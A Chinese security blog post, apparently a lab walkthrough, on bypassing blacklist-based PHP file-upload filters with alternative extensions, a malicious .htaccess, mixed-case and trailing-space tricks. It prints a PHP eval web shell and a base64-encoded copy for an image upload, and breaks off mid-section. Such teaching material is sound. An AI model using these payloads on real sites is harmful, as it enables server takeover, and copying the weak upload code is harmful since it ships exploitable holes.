WEB安全之文件上传（一）开启掘金成长之旅！这是我参与「掘金日新计划 · 12 月更文挑战」的第16天，点击查看活动详情

开启掘金成长之旅！这是我参与「掘金日新计划 · 12 月更文挑战」的第16天，点击查看活动详情

0x7、文件上传

file_put_contents()

当php后缀上传不行时尝试phtml,php5,php4

<script language='php'>@eval($_POST[1]);</script>
');?>

一、黑名单

1、特殊可解析后缀 php3 php5 phtml


if (file_exists(UPLOAD_PATH)) {

$deny_ext = array('.asp','.aspx','.php','.jsp');

$file_name = trim($_FILES['upload_file']['name']);

$file_name = deldot($file_name);//删除文件名末尾的点

$file_ext = strrchr($file_name, '.');

$file_ext = strtolower($file_ext); //转换为小写

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

$file_ext = trim($file_ext); //收尾去空

  


if(!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES['upload_file']['tmp_name'];

$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;

if (move_uploaded_file($temp_file,$img_path)) {

$is_upload = true;

} else {

$msg = '上传出错！';

}

} else {

$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件！';

}

} else {

$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';

}

这里做了黑名单处理，我们可以通过特殊可解析后缀进行绕过。

绕过方法

之前在www.jianshu.com/p/1ccbab572…中总结过，这里不再赘述，可以使用php3，phtml等绕过。

2、上传.htaccess


if (isset($_POST['submit'])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");

$file_name = trim($_FILES['upload_file']['name']);

$file_name = deldot($file_name);//删除文件名末尾的点

$file_ext = strrchr($file_name, '.');

$file_ext = strtolower($file_ext); //转换为小写

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

$file_ext = trim($file_ext); //收尾去空

  


if (!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES['upload_file']['tmp_name'];

$img_path = UPLOAD_PATH.'/'.$file_name;

if (move_uploaded_file($temp_file, $img_path)) {

$is_upload = true;

} else {

$msg = '上传出错！';

}

} else {

$msg = '此文件不允许上传!';

}

} else {

$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';

}

}

?>

我们发现黑名单限制了很多后缀名，但是没有限制.htaccess

.htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置.通过htaccess文件，可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

绕过方法

我们需要上传一个.htaccess文件，内容为：

SetHandler application/x-httpd-php

这样所有的文件都会解析为php，接下来上传图片马即可

htaccess 中的内容：

php_value auto_append_file "php://filter/convert.base64-decode/resource=a.png"

其中a.png的内容为PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4=

解码后为：

3、后缀大小写绕过


if (isset($_POST['submit'])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

$file_name = trim($_FILES['upload_file']['name']);

$file_name = deldot($file_name);//删除文件名末尾的点

$file_ext = strrchr($file_name, '.');

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

$file_ext = trim($file_ext); //首尾去空

  


if (!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES['upload_file']['tmp_name'];

$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;

if (move_uploaded_file($temp_file, $img_path)) {

$is_upload = true;

} else {

$msg = '上传出错！';

}

} else {

$msg = '此文件类型不允许上传！';

}

} else {

$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';

}

}

我们发现对.htaccess也进行了检测，但是没有对大小写进行统一。

绕过方法

后缀名改为PHP即可

4、空格绕过


if (isset($_POST['submit'])) {

if (file_exists(UPLOAD_PATH)) {

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

$file_name = $_FILES['upload_file']['name'];

$file_name = deldot($file_name);//删除文件名末尾的点

$file_ext = strrchr($file_name, '.');

$file_ext = strtolower($file_ext); //转换为小写

$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

  


if (!in_array($file_ext, $deny_ext)) {

$temp_file = $_FILES['upload_file']['tmp_name'];

$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;

if (move_uploaded_file($temp_file,$img_path)) {

$is_upload = true;

} else {

$msg = '上传出错！';

}

} else {

$msg = '此文件不允许上传';

}

} else {

$msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';

}

黑名单没有对文件中的空格进行处理，可在后缀名中加空格绕过。

绕过方法